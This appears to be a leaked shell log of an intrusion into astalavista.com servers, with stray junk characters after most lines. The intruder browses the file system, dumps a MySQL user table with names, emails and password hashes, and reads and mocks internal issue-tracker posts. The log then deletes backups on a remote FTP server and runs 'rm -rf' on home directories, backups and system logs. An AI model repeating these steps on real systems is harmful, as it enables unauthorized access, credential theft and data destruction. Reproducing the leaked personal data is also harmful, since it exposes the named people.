-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db / h' V( E& H. ]+ Y-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck 9 K+ z V8 A/ X L' b: V1 W-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel! m$ d) b0 V! q5 q
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup 8 S) M8 H, {* ~- ldrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin3 r8 g7 d" N$ d l+ A: f6 F
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot 2 H( M/ H1 w/ m0 q) k, Tdrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev s2 G% K8 `3 O- A |" j S. Y
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc % X" j8 M$ V! i3 E3 Z: Jdrwxr-xr-x 14 root root 4096 Mar 11 17:56 home/ C6 m- h" M, i' v3 o
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf $ W9 w- {# ?, ?. L5 e) ndrwxr-xr-x 11 root root 4096 Jun 4 04:02 lib1 R" }! U. O1 I
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib641 f1 @: q! W2 |5 P( C5 k
drwx—— 2 root root 16384 Sep 11 2007 lost+found6 S' q; s/ F- T2 q8 }. ?
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media& v0 t: B2 i0 m! O
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc % U: M; }4 g2 J' Ddrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt 3 {2 J2 ]$ r& U X-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg' q9 \" w! _4 m' i( G q
drwxr-xr-x 2 root root 0 Jun 3 02:43 net 1 V. y4 h1 S6 f& t% ~* Jdrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt& P2 P7 A& a' I/ D
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc% |. G5 w5 }5 q1 J
drwxr-x— 15 root root 4096 Jun 4 08:40 root 6 _. Y2 f' O" d# ~0 v1 m% o/ l' R8 qdrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin7 i% k6 i5 j, X
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux - x% u, j: L+ V7 G2 ?5 Odrwxr-xr-x 2 root root 4096 Mar 11 17:56 srv* v; e; c: s6 r' \+ \
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys: n1 u8 C* X4 ~9 Z; ^% j* b3 X8 K( L
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp3 R; R/ K" }2 V# E
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr3 _) ~3 \ P2 x; ]
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var 1 A B8 z7 O9 o' U F$ V' L' O" m8 }8 X4 Q# q9 K$ X
sh-3.2# cd opt % W6 f* F6 J3 S$ P. Csh-3.2# ls -la & C) g z h/ G# o4 a: ftotal 20 7 M2 U* P$ Z# _3 r6 V" ~( udrwxr-xr-x 3 root root 4096 Mar 11 17:56 .; |$ e" q( {5 y! {
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ... f8 {1 ^) r |) R, l2 z; W- Z8 @7 X9 T
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws d6 u4 s2 i. S3 X1 h
( J ?5 z3 C d
sh-3.2# cd lsws/8 s/ W0 ^; w* r. k& Z# O9 y J
sh-3.2# ls -la8 |8 [8 p9 i7 k
total 108' G; u- m5 m0 K" H3 B
drwxr-xr-x 15 root root 4096 Mar 20 2008 .; E3 p( ^4 w1 t; C0 X
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..5 E: f- |* k% O9 C
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons n4 _- N) P; k& z( D
drwxr-xr-x 13 root root 4096 May 29 15:10 admin 9 G" T U& p' V8 B- |' z+ J+ Idrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate( Y# k2 U8 k' x, B: s
drwxr-xr-x 2 root root 4096 May 29 15:10 bin- ~3 ]0 R% N5 {/ x# @( M2 v; d, E
drwx—— 4 apache apache 4096 Jun 3 02:43 conf0 R' \1 N% Y& z1 y4 b5 H7 j8 k
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT : r @4 D: N) Fdrwxr-xr-x 2 root root 4096 Sep 15 2008 docs& o% Z% c; n( t& Y- i
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin: `' W* D+ I" O2 C! a3 P0 z
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib ; u- c# q" m& M& t& w! S-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE5 n- h: D3 m1 b: c$ J* ^1 j9 e
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP 8 I! f' a6 i$ B-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL. J. i& g `7 O/ l1 }5 s0 k
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP ' ` i$ A+ a2 p4 udrwxr-xr-x 2 root root 20480 Jun 4 09:55 logs @" C( u+ b6 B4 u4 Vdrwxr-xr-x 2 root root 4096 Mar 20 2008 php- q( T4 l& m* m1 S, n- K! j
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild6 x- K8 Y' \3 P4 |
drwxr-xr-x 3 root root 4096 Mar 20 2008 share C) }7 t/ q' B0 ?9 J+ P
-rw-r–r– 1 root root 6 May 29 15:10 VERSION 2 i5 S% g" S/ ~, _ # e9 P1 b, V+ b4 H: H, \sh-3.2# cd conf 3 L, U+ o) j5 p {$ r: X: Q tsh-3.2# ls -la # p) \* u- O/ _8 F- G8 a9 X8 |+ i) Vtotal 48 - F! ~+ \! g4 sdrwx—— 4 apache apache 4096 Jun 3 02:43 . , C6 G+ b# E" h, K( _drwxr-xr-x 15 root root 4096 Mar 20 2008 ..) d! G( ` A* n0 `% x2 ]% q$ Y2 y y
drwx—— 2 apache apache 4096 Mar 20 2008 cert 0 u1 f$ n" U1 |* k7 b-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml' G5 l/ R3 Z( [, \; l: e) R
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak * l) z# Z2 [7 _* P-rw-r–r– 1 root apache 0 Jun 3 14:11 .last; v* l: _2 |5 Z; Z- g6 }, Q
-rw——- 1 apache apache 256 May 29 15:10 license.key! o! i" I7 Z( X* a5 @3 N8 ~0 S
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old ; F+ t% w/ P; r' O* n8 L7 b" K-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties& m) I- }/ I, P9 |
-rw——- 1 apache apache 20 May 29 15:10 serial.no 1 c2 C) w+ c1 _ b( O1 p0 q+ }drwx—— 2 apache apache 4096 Mar 20 2008 templates y4 N q" ~1 l1 m9 i% i- j# j. w. [8 u* a! P; t f, O
sh-3.2# cat serial.no; O8 L1 R, b" \5 b0 j
IbDl-oVsO-CKqL-wVRa 8 i1 v% ^; g& j4 I9 t1 M, ]" j. d" F8 }& a
sh-3.2# mysql # O$ J( d r* c+ n' GWelcome to the MySQL monitor. Commands end with ; or \g.9 p7 T6 f& H' f: Q6 K; y
Your MySQL connection id is 2868449 G) K$ Y1 j3 [
Server version: 5.0.45-community-log MySQL Community Edition (GPL) ( s! g( p# Z2 I D# E6 T5 R) R. _, r4 W8 h0 `% E
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.# f% D: e5 m' Y4 Q: U2 |5 T
2 y: s/ G0 G& N* Y& \; }mysql> show databases; + g2 {" z4 _; @/ y6 Q) m+———————–+3 Z2 J/ g2 `7 X8 b' e
| Database | ; _# e" o4 W) q# s% r' B/ P6 u+———————–+- R6 f+ b6 t" l# ] b$ D
| information_schema |4 L* ?- P6 E8 W( O, {* w9 @" I
| astanet_ads |9 \( g3 r% ^; v: z
| astanet_mailing_lists |7 s: N% x; q$ p! \% t. c% x
| astanet_mediawiki |- M% R. j B* f1 ^4 F) o3 O+ _
| astanet_membersystem |* h1 m* ]7 m* D' T- O ?
| com_contrexx |0 Z. i% a$ T$ c# m4 ~* x
| com_contrexx2 | 2 r3 D9 p3 H2 B' Z$ b5 q| com_contrexx2_live |. T: U8 S6 F/ l$ m
| da_roundcube |/ H; A3 v/ v" L N0 t
| dolphin | 2 U' t1 a$ a. m: z7 M. ^# |: V; [! t| ideapool | ; |8 Z& Q3 j6 ^: c' d| mysql |3 P( F# ^- ~6 O: L* w$ S
| test | ' R9 u' g" G$ \| yourmaster | + c. F; N {' ^. D$ ]. w2 O+———————–+ / B5 [3 @" S! K8 V& I8 c- T% b& o14 rows in set (0.00 sec) 4 {+ c% Q2 b# [- ?: H; H0 p$ G7 ~" K/ s$ i- y
mysql> use ideapool " ~& k; L# ]6 z. aDatabase changed, y. v, Q6 v" L
mysql> show tables; , J, o( [3 L1 @% I$ O( o8 }+———————————–+ 0 c; j3 t. }' R| Tables_in_ideapool |$ h, o2 C6 N& H: n* w6 c; H
+———————————–+ / y( M. K+ l3 w% u4 c0 G8 V| eventum_columns_to_display | $ F& C: W$ `* O| eventum_custom_field |4 d2 W4 }7 _% e: O% o2 w' g
| eventum_custom_field_option | # a; m/ s5 z" L1 o3 v) b| eventum_custom_filter |- v/ G6 U; c- S/ ]! U
| eventum_customer_account_manager |4 m) V/ ]$ p) G+ d' e' A) y, h
| eventum_customer_note |$ g( K2 a1 a$ Y) L: s* e6 v9 j( |3 g
| eventum_email_account | " M' L8 x7 ?! [ W| eventum_email_draft |' H4 S% F( A5 E; \ P; D
| eventum_email_draft_recipient | , A9 f' `% F) G6 `( z| eventum_email_response |4 c; c/ Q" I# r% C7 @6 E$ j7 P
| eventum_faq | $ q) b/ q3 f0 q$ r5 n% S| eventum_faq_support_level |# J4 K4 r% S( a$ u) F1 g" W
| eventum_group |9 [. { y" l1 d1 Q, ]9 f2 T) D
| eventum_history_type | : r6 m) I# w, r- @| eventum_irc_notice |' J4 Z8 O* q( P# m" g- c
| eventum_issue |; Z- q0 j1 }5 J$ P
| eventum_issue_association |) w M8 B$ ~9 A Z: t$ s( Z; [
| eventum_issue_attachment |) |8 `- K! B# T, J
| eventum_issue_attachment_file | - n* J, a& N, q5 x, r' @5 u' r| eventum_issue_checkin |, a/ [, t6 I; f* D X
| eventum_issue_custom_field |8 _" `: l8 S, r. x; o- O
| eventum_issue_history |- Y/ d! m! _2 ~6 d& v
| eventum_issue_quarantine |: C7 m9 _( G- k9 K+ B- F7 A
| eventum_issue_requirement | 1 G& r7 D: i; |7 X| eventum_issue_user |1 ~. D4 q5 ]( m% E; ?( Y# ]
| eventum_issue_user_replier |4 q* H$ L8 G) Y5 V
| eventum_link_filter | % O: i# c6 a( p) _% || eventum_mail_queue | ' F$ f/ K x4 W, \7 @& C3 v8 M| eventum_mail_queue_log |+ g3 n( f1 x$ [0 T& j
| eventum_news | / B! a5 d% ~2 `2 D6 l| eventum_note | # L5 s, B" E! F: z5 q- B* ^| eventum_phone_support |. v$ Q2 X7 v' o6 _
| eventum_project |3 E1 n# Q8 ^( s2 z
| eventum_project_category | ) h2 Q; B' B/ }, l# U: l| eventum_project_custom_field |/ l9 y2 J" C) l0 l" F2 y- M
| eventum_project_email_response |7 h$ O2 |2 a, b0 o* g
| eventum_project_field_display |! X" m8 m; v- r" Z1 U7 D
| eventum_project_group |: l6 P2 I& h* S1 Y( _
| eventum_project_link_filter |7 ^9 P+ o& }9 Y2 M$ ]# L
| eventum_project_news |7 Q8 Z+ _2 @2 L1 K' f
| eventum_project_phone_category | 9 Y* [) j" G! f s l+ E| eventum_project_priority |: s2 w) I* ]5 A; ?
| eventum_project_release |+ N# F2 P8 {/ Y
| eventum_project_round_robin | 7 r( n: D m9 N3 m% a' _| eventum_project_status | : r- O8 v8 E9 O3 p* c# J| eventum_project_status_date |$ f$ @* e6 }: P; q; G( Q
| eventum_project_user | 1 I; d" P9 [8 E" M6 f# G. v V) b| eventum_reminder_action | ! }1 ?$ h; a5 B" W| eventum_reminder_action_list | ; a7 R- K( f, t) b+ i" x# n. X| eventum_reminder_action_type |& s s3 b. v. D1 S% ]2 ]
| eventum_reminder_field | 9 m; Q$ G5 ~) _* q, \- {1 D| eventum_reminder_history | % r7 ?8 j4 Z9 i& |$ T4 U& T| eventum_reminder_level |$ b) { u0 e3 q' }* ]$ [
| eventum_reminder_level_condition |2 p# R3 |% u( u+ {! @
| eventum_reminder_operator |$ r* c) C' S. U n/ t. C
| eventum_reminder_priority |9 ?; K: E& }2 R) F K; O& X
| eventum_reminder_requirement | / _% w& w& ]/ \9 |: X| eventum_reminder_triggered_action |" H/ i. V7 N2 f8 I( }
| eventum_resolution |) X0 Q* k9 T5 l+ a* }' u
| eventum_round_robin_user |5 t5 w H) w2 s& q' z; }$ I s# s- c3 W2 S
| eventum_search_profile |9 X3 ?. p: ?* }9 ]( e+ e
| eventum_status | 9 W8 |9 ]& @1 u) G; y3 e| eventum_subscription | ; [ ^1 K) o4 H9 L" v+ j N5 x| eventum_subscription_type |+ k! z0 a" O) [ K: d
| eventum_support_email |9 R F, M4 w6 B/ A. T) b8 D
| eventum_support_email_body |7 l w N( d7 H4 y0 `7 T
| eventum_time_tracking | 5 `) H" @- g# f- D+ E| eventum_time_tracking_category | : {9 I; |1 V1 ^| eventum_user |+ Q& p4 ^8 P# b% x4 y" V
+———————————–+9 q/ o* b' Q5 h& c
69 rows in set (0.00 sec) ) C/ D3 t; i; v3 j0 \ ( Z7 N% G) Z m9 zmysql> describe eventum_user; & Z% [9 _: Z9 r1 p! ?1 \( R: W! ~" A+————————-+——————+——+—–+———————+—————-+' b$ @8 B& j- t7 f" P
| Field | Type | Null | Key | Default | Extra | $ z3 l/ I" G& l, X* A; A+————————-+——————+——+—–+———————+—————-+* i9 h( [8 M$ g5 t0 g
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |( [% H& l: P5 c& }6 r y
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | | ; k, M- G0 `( a" _| usr_customer_id | int(11) unsigned | YES | | NULL | | 7 g3 L# ^3 ]! ]( _2 K7 j, g| usr_customer_contact_id | int(11) unsigned | YES | | NULL | | # \8 c9 ^' ]1 t9 p+ D| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |& a+ K) } y9 y, v
| usr_status | varchar(8) | NO | | active | | 9 K$ z4 ?) L, }2 a- g| usr_password | varchar(32) | NO | | | | * A3 ]& `* M, @- y9 o0 T| usr_full_name | varchar(255) | NO | | | | 4 a7 N7 j# h9 p( g5 |' ~| usr_email | varchar(255) | NO | UNI | | | ; V: Y5 \) z9 p" @/ {8 L( v| usr_preferences | longtext | YES | | NULL | | 0 K. l4 A% ^8 D, m& k& {| usr_sms_email | varchar(255) | YES | | NULL | |! G, n5 ?/ `/ ]0 m9 y' x
| usr_clocked_in | tinyint(1) | YES | | 0 | |1 W6 k! K3 m; Q5 f. n+ p |. p
| usr_lang | varchar(5) | YES | | NULL | |$ B+ t8 Q. A/ V
+————————-+——————+——+—–+———————+—————-+ ! A9 h% r; g) _5 H* ^13 rows in set (0.00 sec)& q' G* w4 u0 t; D
5 F }$ _ }& e4 _
mysql> select usr_full_name,usr_email,usr_password from eventum_user; 8 z0 ]* @) t6 Z* _+———————-+——————————-+———————————-+8 ?8 Z3 s7 e+ \6 ~* p" v5 e+ n
| usr_full_name | usr_email | usr_password | 6 j0 n0 M/ }. `( c; a$ P+———————-+——————————-+———————————-+1 v4 g7 L, R( a. A5 |
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |+ m0 D/ c. T& P$ X) b( @ f
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |$ ?, H) ?5 {+ t. V1 f* @2 n5 j
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce | ( M+ ]5 ?. x* U+ h8 q: C| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c | 7 h9 _: d# r/ y; L7 r9 Z| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |6 u% X; u2 B1 `7 C; ?
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |. c$ e9 c/ l& M N, W1 v
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 | 1 i. n+ \! H Q4 }) I' ^| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |# w6 u9 n9 p: o' ]
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |! M. @, @$ Y) f4 b' ^* |& @
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 | & x1 @9 Y5 B. O8 C| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |; h0 O5 h: @( e2 T
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e | 4 Q% M/ X0 Z2 f \9 z| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |$ f0 A; p, n6 a, c' A! z
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 | 0 m i" Y! u& U| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |' n( V: r F5 e
+———————-+——————————-+———————————-+/ ^+ V* u! [' t' w r
15 rows in set (0.00 sec) ! P ~% I: ?: o) S7 U- p $ n8 I1 d# ?1 D) s$ c# h$ Gmysql> select iss_description from eventum_issue where iss_id = 43; 7 ?) M4 O3 l3 G- K9 b+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+8 F) q8 X8 k" y2 u! w/ Q
| iss_description ! P; e% g1 \+ \1 x4 i& V
| `6 A( p+ [9 L9 F" O/ {' Q/ C7 L
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+ 2 j2 h( W" v5 C% o2 I' M1 g| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be% R/ Y: F, ~( ^5 b- W! \
connected for 90 mins… 120mins… so what i propose is something like: 4 Y1 q* w3 F. O链接标记[url]http://www.surfthechannel.com/[/url]; k& k( |, D7 G! } i* y
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system w% z" p F( ]: g2 F a+ h1 _like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t 1 w8 x' q4 G4 Obreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off . Y+ M5 X+ _1 p& ]9 [; U0 Bif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA… 3 H3 i" `8 x2 Q4 S' N4 h- }! K, R, n8 D( c& f4 x) ]! x# \/ d5 ?5 c
We could also put advertisement during play on the flash video player itself… extra $$… ' X* o+ c0 A5 Q) F0 P5 F " [, A/ h8 o# | C) XBy sykadul | # \: c# r- i. k+ X+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+% F9 Y9 N6 N( N: N2 [# U
1 row in set (0.00 sec) 2 l2 \5 U/ @8 ~& c( x2 o . i$ f- |+ P( D1 J. u, B// Money and extra $$ is all they care about. remember that.5 o2 U- C; V- q6 X @0 n, c h$ U, J
' |( j3 H$ ]( M- a7 t
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42; 7 \& h+ x( {& X: o" m8 d+————————+——————————————————————————————————————————————————————————————————————————————-+ + b8 C" m9 B0 k/ D8 O( a| iss_summary | iss_description 8 I; g. ]( n* l/ O7 k) x|% k5 B- q3 _' `! E- l# ^# P+ E% `
+————————+——————————————————————————————————————————————————————————————————————————————-+' Z8 i' w" F+ V+ o8 \
| Forum for REAL EXPERTS | Hello,! f2 T5 T. S7 D$ Z4 J
8 w- {6 g9 X# @4 Q- Z$ SIshtus and I,! ~; ]# M' C& W; t3 `8 o0 N2 D
0 b: R' W# S8 C/ _0 C0 c
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide - J3 m' w C" j6 X& o3 |# Z8 CONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..0 c# y% |- P7 Q, L: x
( e% Z) N8 ^$ N" G" {) q7 y' O/ GOne example a friend of mine from coresecurity.com! ; U9 l4 N s% s+ x7 @0 z ' \2 d' n" c5 @3 ~+ W( Z. cWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..' \0 Z. Z4 ]' ~5 D. j, j
Q* z- V, t! a8 X
| ! e! n1 P5 S1 W* g9 w3 p+————————+——————————————————————————————————————————————————————————————————————————————+ ) u# n& ~/ H% x3 q$ S3 q1 row in set (0.00 sec)+ |2 H: W6 \ a2 J
! l( s8 k' |! e. y+ j8 [% m t Q9 N// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs… * [0 Q& T! G7 f, `& ^+ m' a- L% y+ r- Y: x% x! r/ T8 t
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16; 8 e- z! }3 P* ^" c# q3 @& ~- T& i+——————+———————————————————————————————+ + |- y( G1 c4 ~* Y+ H* B; V| iss_summary | iss_description | e/ h& L) `7 P6 E( _% T2 t2 q
+——————+———————————————————————————————+ : l% F/ [- Z: m2 T| Website guidance | Virtual Girl which guides you trought the website.8 a, \& s9 c% k1 T- ]' S" ^# k; I
/ E: l8 Z" S2 a$ x; l
We need a girl with who you can ( talk )!!! 6 Y3 r m! z" d H7 \ x6 V* L5 u# \Also for the News!9 Q t1 C- R& ? K
So my suggestion is a girl who read you the news loud if you like! 0 Z; ~& q! I6 w( D, w" P& N) Tyou can choose between read yourselfe or she read it for you or both!2 g' f. d, X, E7 ~! s4 J" z( B
" Q8 e2 l2 J V9 H1 h0 z6 m- ~Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!( c9 t5 ^) E/ Z( g+ O' h
/ o. y0 S$ d; m( F
Have a look on the example girls!! * S( Y2 x" z; h4 [8 Q2 ^& A6 z' U4 H: p/ J1 r# t% ^5 ^ 链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]/ Y! }" R1 G# c4 X: p
8 k8 r! m( y: _+ S' I9 d8 {2 V6 k
or that1 J+ N$ B5 B6 G+ g0 F8 a
7 ~, T' V2 @5 I; Q 链接标记[url]http://www.yellostrom.de/[/url]2 @9 ?" H$ [$ |# _' |* c
5 @$ k0 q* x) R i: `| 3 x" S/ r$ `# G% s" Y( b* _. @+——————+———————————————————————————————+ $ ?$ H& s, E2 r1 row in set (0.00 sec) 2 x5 `( o3 y) P0 ]7 d3 v. d4 e# |: B8 @
// ha ha. ) o+ [# ]0 `" X6 E+ m 2 m3 b; a; |/ H5 E: L) O) Pmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;. p6 o5 K# W# j/ H. l
+————————–+———————————————————————————————————–+ . H, H" E: h$ m2 o| iss_summary | iss_description |% R( L6 ~) C+ T! n9 H& M
+————————–+———————————————————————————————————–+ ; f5 Z1 O W/ z0 T; U| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |% q- C$ u9 Q: ]9 Y: X- k& G
+————————–+———————————————————————————————————–+ 7 d5 `, `/ R: a' y7 e2 Y1 row in set (0.00 sec)5 L6 a) O K$ e0 e/ c0 [! \$ ?
: ?+ c: ?( J. S! {9 F( l6 s// LOL.; |! H+ U( @* Z* O
( u. { F% u9 n* Z) ?4 I/ @, [mysql> exit* B# l2 W \/ \2 e1 B( }8 M, M
Bye( n6 T# B$ r' H# k
" C1 M& S- y' ssh-3.2# ftp 212.254.194.163 $ c3 V; q' }9 H- Z6 e2 `. A7 i7 Y0 uConnected to 212.254.194.163. % I: o. s, `$ j# L7 {& d' ]7 Y220 BackupCOM_VW FTP server ready. 1 A0 t+ V) x$ p( T l8 ]5 A" h/ u504 AUTH: security mechanism ‘GSSAPI’ not supported.0 F/ d8 m7 }$ ?, i0 J3 D8 E& M3 ~4 W
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.6 M) C7 Z* \ `! O" |) u0 }
KERBEROS_V4 rejected as an authentication type ( O" J8 U9 e, {3 qName (212.254.194.163:root): astalavista.com: y: I; n+ H8 |; }* ~% _. E
331 Password required for astalavista.com.. b( E8 Z8 x! @) B
Password: 7 @0 G% N$ I9 q$ h, C. x230 User astalavista.com logged in. 4 p( D% v: n. `6 X: `7 n2 tRemote system type is UNIX. 9 k3 O, L7 @2 E, G0 e' R7 |$ S# u& IUsing binary mode to transfer files.% D2 h- P3 |7 |9 k- z
ftp> ls -la1 b k) G+ g+ V* H
227 Entering Passive Mode (212,254,194,163,2,188) + l ^0 H7 l, S' t$ P150 Opening BINARY mode data connection for ‘file list’. " Y3 V" {; f9 `) Xdr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com 8 v" q& w5 P" G! Q/ p: |226 Transfer complete.5 w& {- d- a( a. A3 K+ J
ftp> cd astalavista.com' [, z# S8 ~2 F$ `4 F) s5 I, I
250 CWD command successful. 1 {% k. b$ w5 i8 ~% x3 f& \ftp> ls -la 2 u$ ]# O* m& z227 Entering Passive Mode (212,254,194,163,2,189) ' ]) E. o2 U, u8 d5 i- B& ]& x150 Opening BINARY mode data connection for ‘file list’.6 @, E! y5 _' @
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar1 a5 k/ L v6 O! {
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz21 Q' P' X' ^# y3 n2 ]" ?0 `. ]
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz24 r( x9 u6 Z( J/ X% L
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar- W t$ }4 _9 g: H
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar - ^3 @. E" @- Q9 w7 F* r P[snip] 7 n& `' i; s$ s0 a) l226 Transfer complete. 4 ?0 G- q( w1 Y% P7 a/ a3 B* ?ftp> mdelete * / D: M+ W# t2 W) x. \3 Dftp> ls -la5 }3 H$ r2 H, \- ]6 @9 L7 R
227 Entering Passive Mode (212,254,194,163,2,193) / t4 }- C$ v- {* b# l150 Opening BINARY mode data connection for ‘file list’. 2 M; Y; c. }4 f8 I3 h# @226 Transfer complete. 8 U3 j( z& Y* n* P, {% s$ {3 Rftp>; ~ Y9 U! n# P
1 U8 E& f8 J8 E' E% Y
sh-3.2# cd /home! u# {3 Y: m8 [. B1 L7 Q D
sh-3.2# ls -la7 Q% W2 m8 I8 ]6 @# r/ K1 f
total 120* v9 S9 k! ^# J3 z' U) p+ S( w
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .# v( i. [3 s' s$ t) H
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .. a/ j' |- S! D+ S" Cdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin ) A/ q- @: v- y% `3 ?1 u% C-rw——- 1 root root 8192 Jun 4 03:03 aquota.group z( |! j* M4 a. z) {/ `
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user; m% D+ C/ N3 ~: o1 X8 M' A& J
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet; t6 E) }% l5 ~& ]& l. U. G- G9 p
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup' |5 R' P) o. i
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.141614 o8 r0 J, C# x0 {6 |) x
drwx–x–x 10 com com 4096 Apr 28 12:40 com " W# W7 k: |3 A. ^# `8 G* Sdrwxr-xr-x 2 root root 4096 May 17 2007 ftp 2 A- g; K$ C* n; X8 p5 t3 ^, udrwx—— 3 jon jon 4096 Sep 21 2007 jon ; _" m; r1 g% I1 p% T2 U1 gdrwx—— 2 root root 16384 Sep 11 2007 lost+found 7 |! R6 i3 c- g ndrwxr-xr-x 2 root root 4096 Sep 14 2007 my- _; Q$ i1 f, q O
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata ; m1 a- ?# N& o& ydrwx—— 2 jon jon 4096 Sep 15 2007 test / d# m. g7 d4 H2 T) D; t3 J- tdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp( }3 [6 D0 _# f2 w; v& W
( D! ?; X* N0 [( |; ?sh-3.2# rm -rf backup/ 8 w: l/ z* b4 k0 c ~! G/ N+ Rsh-3.2# rm -rf backup.14161/: a: V( K7 Z9 \ t" Q- t( d7 J
sh-3.2# rm -rf ftp/ ; m; b, r% C( Z t! hsh-3.2# rm -rf jon/3 V0 I9 k' s! K7 g! R! v) h! R J
sh-3.2# rm -rf my/& Q3 ~) _ M( d
sh-3.2# rm -rf mysqldata/ 6 Z3 c/ L! h5 `sh-3.2# rm -rf test/) J' D* m- I, c- p- ^; W: z
sh-3.2# rm -rf tmp/ 8 [! }# r' Y; ksh-3.2# cd ~7 \' ?. Q c# I1 }8 v- T7 I
sh-3.2# rm -rf * : H" A$ X2 c0 Q2 Rsh-3.2# rm -rf /var/log/+ i: |8 i9 V$ @) ]
rm: cannot remove directory `/var/log//proftpd’: Directory not empty ' o& r6 e0 Y' m% ksh-3.2# rm -rf /home/*/ d+ H3 J3 X5 r t
